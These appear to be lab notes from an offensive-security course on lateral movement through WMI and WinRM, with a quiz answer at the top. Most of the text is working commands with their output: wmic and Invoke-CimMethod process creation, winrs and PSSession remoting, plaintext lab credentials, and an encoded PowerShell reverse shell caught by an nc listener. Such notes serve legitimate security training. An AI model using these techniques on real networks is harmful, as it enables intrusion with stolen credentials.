Topics: WMI and WinRM Lateral Movement
Questions 1
Launch VM Group 1 and repeat the steps discussed in this section. Which PowerShell cmdlet has been used to create a WMI session?
# Answer
New-CimSession

# The first lateral movement technique we are going to cover is based on Windows Management Instrumentation (WMI), which is an object-oriented feature that facilitates task automation.

# WMI is capable of creating processes via the Create method from the Win32_Process class. It communicates through Remote Procedure Calls (RPC) over port 135 for remote access and uses a higher-range port (19152-65535) for session data.

# To create a process on the remote target via WMI, we need the credentials of a member of the Administrators local group, which can also be a domain user. In the following examples, we are going to perform the attacks as the user jen, which is both a domain user and a member of the Local Administrator group for the target machines.

# Historically, wmic has been abused for lateral movement via the command line by specifying the target IP after the /node: argument then the user after the /user: argument, and then the password after the /password: argument.

xfreerdp /cert-ignore /u:jeff /d:corp.com /p:HenchmanPutridBonbon11 /v:192.168.195.74

# Open powershell 
wmic /node:192.168.195.73 /user:jen /password:Nexus123! process call create "calc"
...
        ProcessId = 516;
        ReturnValue = 0;
...

# The WMI job returned the PID of the newly created process and a return value of "0", meaning that the process has been created successfully

# First, We need to create a PSCredential object that will store our session username and password.

# To do that, we will first store the username and password in variables. Then, we will secure the password via the ConvertTo-SecureString cmdlet. Finally, we'll create a new PSCredential object with the username variable and secureString object
```
$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
```

# Now that we have our PSCredential object, we need to create a Common Information Model (CIM) via the _New-CimSession cmdlet.

# To do that, we'll first specify DCOM as the protocol for the WMI session with the New-CimSessionOption cmdlet on the first line. On the second line, we'll create the new session, New-Cimsession against our target IP, using -ComputerName and supply the PSCredential object (-Credential $credential) along with the session options (-SessionOption $Options). Lastly, we'll define 'calc' as the payload to be executed by WMI.
```
$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName 192.168.195.73 -Credential $credential -SessionOption $Options 
$command = 'calc';
```

# As a final step, we need to tie together all the arguments we configured previously by issuing the Invoke-CimMethod cmdlet and supplying Win32_Process to the ClassName and Create to the MethodName. To send the argument, we wrap them in @{CommandLine =$Command}.

Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};
...
ProcessId ReturnValue PSComputerName
--------- ----------- --------------
     1984           0 192.168.195.73
...

# Create Revshell with WinRM methods 

# To further improve our craft, let's replace the previous payload with a full reverse shell written in PowerShell. First, we'll encode the PowerShell reverse shell so we don't need to escape any special characters when inserting it as a WMI payload.

[pwsh-revsh-encode.py]
python3 pwsh-revsh-encode.py

# Go back to the Windows CLIENT74
```
$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$options = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName 192.168.195.73 -Credential $credential -SessionOption $Options
$command = '# Paste the encoded pwsh-revshell';
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};
```
nc -lvnp 443
PS C:\Windows\system32> hostname
FILES04
PS C:\Windows\system32> whoami
corp\jen

# We indeed managed to move laterally and gain privileges as the jen domain user on an internal server by abusing WMI features.

# ! Second Methods !
# WinRM can be employed for remote host management. WinRM is the Microsoft version of the WS-Management protocol and it exchanges XML messages over HTTP and HTTPS. It uses TCP port 5986 for encrypted HTTPS traffic and port 5985 for plain HTTP.

# WinRM is implemented in numerous built-in utilities, such as winrs (Windows Remote Shell).

# The winrs utility can be invoked by specifying the target host through the -r: argument and the username with -u: and password with -p. As a final argument, we want to specify the commands to be executed on the remote host
C:\Users\jeff>winrs -r:files04 -u:jen -p:Nexus123! "cmd /c hostname & whoami"
FILES04
corp\jen

# The output confirms that we have indeed executed the commands remotely on FILES04.

# To convert this technique into a full lateral movement scenario, we just need to replace the previous commands with the base64 encoded reverse-shell we wrote earlier.

nc -lvnp 443
winrs -r:files04 -u:jen -p:Nexus123! "# Paste the encoded pwsh-revshell"

PS C:\Users\jen> whoami
corp\jen
PS C:\Users\jen> hostname
FILES04

# PowerShell also has WinRM built-in capabilities called PowerShell remoting, which can be invoked via the New-PSSession cmdlet by providing the IP of the target host along with the credentials in a credential object format similar to what we did previously.

```
$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
New-PSSession -ComputerName 192.168.195.73 -Credential $credential
```
...
  1 WinRM1          192.168.195.73  RemoteMachine   Opened        Microsoft.PowerShell     Available
...

# To interact with the session ID 1 we created, we can issue the Enter-PSSession cmdlet followed by the session ID.
PS C:\Users\jeff> Enter-PSSession 1
[192.168.195.73]: PS C:\Users\jen\Documents> whoami
corp\jen
[192.168.195.73]: PS C:\Users\jen\Documents> hostname
FILES04

